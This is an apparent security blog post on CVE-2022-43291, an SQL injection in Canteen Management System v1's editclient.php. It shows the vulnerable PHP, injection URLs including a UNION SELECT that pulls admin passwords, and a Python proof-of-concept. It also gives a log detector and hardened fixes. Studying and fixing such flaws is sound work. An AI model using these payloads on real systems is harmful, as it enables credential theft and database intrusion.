In 2022, a serious SQL injection vulnerability (CVE-2022-43291) was found in Canteen Management System v1. The bug lets an attacker manipulate the application's database simply by tampering with a URL parameter. In this post we break down what happened, show how the injection works with code snippets, and suggest ways to fix it so others can learn from it.

- Product: Canteen Management System v1.
- Vulnerable File: /youthappam/editclient.php
- Parameter: id
- Type: SQL Injection (OWASP Top 10)
- CVE: CVE-2022-43291

Summary:
A user-controlled id parameter is not sanitized before it is used directly in a SQL query. This means an attacker can inject SQL, potentially exposing or destroying sensitive data.

Here’s an example of the vulnerable code inside editclient.php:

<?php
// Vulnerable snippet
include('db.php');
$id = $_GET['id'];
$query = "SELECT * FROM clients WHERE id = $id";
$result = mysqli_query($con, $query);
// ... display client info for editing ...
?>

Issue:
The id comes straight from the URL, e.g. /youthappam/editclient.php?id=1, and is concatenated into the query with no checks. Because the value is never validated or parameterized, a crafted parameter changes the structure of the SQL statement itself, not just the value being compared.

Navigating to the following URL loads a single client record:

http://server/youthappam/editclient.php?id=1

Now consider what happens if SQL is supplied in place of the number:

http://server/youthappam/editclient.php?id=1 OR 1=1

This modifies the query to:

SELECT * FROM clients WHERE id = 1 OR 1=1

The WHERE clause is now always true, so the query returns every client rather than just the one with id=1.

The parameter can be manipulated further to extract data from other tables, or to perform blind SQL injection when results are not displayed directly. For example:

http://server/youthappam/editclient.php?id=1 UNION SELECT 1, username, password FROM admin--

If the application is not protected, this can return admin usernames and passwords, because the SQL query now looks like:

SELECT * FROM clients WHERE id = 1 UNION SELECT 1, username, password FROM admin--
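Because a legitimate request to editclient.php only ever carries a bare integer in id, anything else in that parameter is a strong signal of tampering. The following PHP script, added here as an example and not part of the original post or the product, scans web server access log lines for exactly that condition. The log lines are constructed for the demonstration; the path /youthappam/editclient.php and parameter name id are taken from the advisory above.

```php
<?php
// Added example (not the project's code): flag access log entries where the
// `id` parameter of editclient.php is anything other than a plain integer.
// Requires PHP 8 for str_ends_with().

// Constructed sample lines in Apache common log format (not real traffic).
$logLines = [
    '10.0.0.5 - - [09/Nov/2022:15:15:00 +0000] "GET /youthappam/editclient.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Nov/2022:15:15:03 +0000] "GET /youthappam/editclient.php?id=1%20OR%201%3D1 HTTP/1.1" 200 8123',
    '10.0.0.9 - - [09/Nov/2022:15:16:10 +0000] "GET /youthappam/editclient.php?id=1+UNION+SELECT+1,username,password+FROM+admin-- HTTP/1.1" 200 640',
    '10.0.0.7 - - [09/Nov/2022:15:17:42 +0000] "GET /youthappam/index.php HTTP/1.1" 200 2048',
];

/**
 * Return one entry per request whose editclient.php `id` value is not a
 * bare non-negative integer. Each entry holds the client IP and the decoded
 * parameter value so an analyst can see what was actually sent.
 */
function findSuspiciousIdRequests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Extract the client IP and the request target from the log line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue; // not a request line we understand
        }
        [, $ip, $target] = $m;

        $parts = parse_url($target);
        if (!isset($parts['path'], $parts['query'])
            || !str_ends_with($parts['path'], '/editclient.php')) {
            continue; // different script, or no query string at all
        }

        // parse_str() percent-decodes and turns '+' into spaces, so the
        // value is compared in the same form the PHP script would receive it.
        parse_str($parts['query'], $params);
        if (!isset($params['id'])) {
            continue;
        }

        // Only a bare integer is a legitimate record selector.
        if (!preg_match('/^\d+$/', $params['id'])) {
            $hits[] = ['ip' => $ip, 'id' => $params['id']];
        }
    }
    return $hits;
}

foreach (findSuspiciousIdRequests($logLines) as $hit) {
    printf("ALERT %s sent id=%s\n", $hit['ip'], $hit['id']);
}
```

On the sample above the script reports the second and third lines (the `OR 1=1` and `UNION SELECT` values) and stays silent on the normal request and the unrelated page. The same positive-integer rule is what the application itself should enforce on input, so a hit here means a request reached the server that the fixed code would reject with an error.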

Exploit PoC Script (Python)

Below is a simple exploit script to confirm the vulnerability. This example just retrieves data using a basic payload.

import requests

# Target URL
url = "http://server/youthappam/editclient.php"

# SQLi payload (change as needed)
payload = '1 UNION SELECT 1, username, password FROM admin-- '

# Send GET request
params = {'id': payload}
response = requests.get(url, params=params)

# Print results
print(response.text)

⚠️ Warning: Never use this on systems you do not own or do not have permission to test!

Responsible Disclosure & References

- NVD CVE-2022-43291 entry
- Exploit Database listing *(if available)*
- OWASP SQL Injection

1. Use Prepared Statements

The right way to defend against SQL injection is to use prepared statements. Here’s how you fix the vulnerable code:

<?php
// Secure snippet
include('db.php');
$id = $_GET['id'];
$stmt = $con->prepare("SELECT * FROM clients WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
// ... display client info for editing ...
?>

2. Validate Input

Always check that user input is the right type and in the right range:

$id = intval($_GET['id']);
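Putting the two defenses together, here is a complete hardened version of the handler. This is an added example, not the project's own code: it assumes, as the snippets above do, that db.php provides a mysqli connection in $con and that clients has an integer primary key named id. Unlike intval(), which silently turns "1 OR 1=1" into 1, FILTER_VALIDATE_INT rejects anything that is not a whole integer, so tampering produces a 400 response rather than a quietly different record.

```php
<?php
// Added example (not the project's code): hardened editclient.php lookup.
// Assumes db.php sets up a mysqli connection in $con and the `clients`
// table has an integer primary key `id`.
include('db.php');

// 1. Validate: the id must be a positive integer. Any other value, including
//    "1 OR 1=1" or "1 UNION SELECT ...", fails validation before any SQL
//    is built. filter_input() returns null if the parameter is absent and
//    false if it is present but invalid.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('Invalid client id');
}

// 2. Parameterize: bind the value as an integer instead of concatenating it
//    into the query string. Even if validation were skipped, the statement
//    structure could no longer be changed by the input.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false
$stmt = $con->prepare('SELECT * FROM clients WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();
$client = $stmt->get_result()->fetch_assoc();
$stmt->close();

if ($client === null) {
    http_response_code(404);
    exit('Client not found');
}

// 3. Values read back from the database are still untrusted when rendered,
//    so escape them on output as well.
foreach ($client as $field => $value) {
    echo htmlspecialchars($field, ENT_QUOTES, 'UTF-8'), ': ',
         htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8'), "<br>\n";
}
```

With mysqli_report() set to throw, a failed prepare or execute raises a mysqli_sql_exception instead of returning false, which prevents the common follow-on bug of calling methods on a false result and lets a global handler log the failure without echoing database errors to the user.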

3. Limit Database Permissions

The database account used by your app should have only the rights it needs, and no more.

4. Audit and Maintain

- Regularly audit your code for vulnerabilities like SQL injection.
- Keep libraries/frameworks up to date.

Final Thoughts

CVE-2022-43291 is a textbook example of SQL injection, yet these bugs keep popping up in the wild. The fix isn’t complicated, but it’s vital. If you run Canteen Management System v1., update your code right now and check for unprotected inputs elsewhere in your site.

Stay safe, code safe.

*If this helped or you have questions, let us know below!*

References:
- NVD CVE-2022-43291
- OWASP SQL Injection Cheat Sheet

Timeline

Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:01:00 UTC